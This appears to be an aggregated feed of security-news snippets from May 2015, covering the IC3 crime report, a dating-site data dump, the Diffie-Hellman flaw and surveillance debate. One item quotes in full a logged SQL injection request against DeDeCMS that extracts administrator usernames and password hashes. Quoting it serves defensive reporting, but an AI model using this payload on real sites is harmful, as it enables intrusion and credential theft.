Original release date: May 22, 2015 The Internet Crime Complaint Center (IC3) has released its Internet Crime Report for 2014, indicating that scams relating to social media — including doxing, click-jacking, and pharming — have increased substantially over the past five years. US-CERT encourages users to review the IC3 Alert for details and refer to the US-CERT Tip ST04-014 for information on social engineering and phishing attacks. This product is provided subject to this Notification and this Privacy & Use policy.
Author: Perry Varanoid
The latest one . As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered
Are you too busy provisioning new servers and reseting your users’ Windows passwords to keep up with information security news? If so, we have a quick solution for you. Learn the most important security issues in under ten minutes with our weekly security review video
If you date online, especially at “adult” dating sites, you may want to reconsider how much data you share with these organizations. This week, a researcher found a stolen user data dump from a very popular adult dating site. Watch the video to learn the details, and find out how to learn whether or not you are affected by this and other breaches
Typically we try to device attackers into different groups, all the way from Script Kiddies (no resources, no skills, quite a bit of time/persistance) to more advanced state sponsored attackers (lots of resources, decent skills and ability to conduct long lasting persistent attacks). So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS”> The attack: GET /uploads/plus/search.php?keyword=11typeArr[%60@%27%60and%28SELECT1%20FROM%28selectcount%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29fromdede_adminLimit0,1%29%29afrominformation_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1 301 178 – Python-urllib/2.7 DeDeCMSis a Drupal like content management system popular in China 
A man was arrested for drug dealing based on the IP address he used while querying the USPS package tracking website.
This week, a group of university researchers disclosed a new vulnerability affecting the Diffie-Hellman key exchange. The Diffie-Hellman (DH) key exchange is a cryptographic method for two systems to establish a shared secret over a public communication channel, which they later use to encrypt their communications. Many encryption protocols, including HTTPS, SMTPS, IPSec VPN, SSH, and other TLS implementations, use it to set up shared secrets.
The ACLU’s Chris Soghoian explains (time 25:52-30:55) why the current debate over Section 215 of the Patriot Act is just a minor facet of a large and complex bulk collection program by the FBI and the NSA. There were 180 orders authorized last year by the FISA Court under Section 215 — 180 orders issued by this court. Only five of those orders relate to the telephony metadata program
Two new high-profile hacks this week collectively exposed millions of users’ data, both more worrying than what has become a run-of-the-mill credit card breach. The reasons for concern, of course, are a bit different.
ISC StormCast for Friday, May 22nd 2015 http://isc.sans.edu/podcastdetail.html?id=4495, (Fri, May 22nd)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.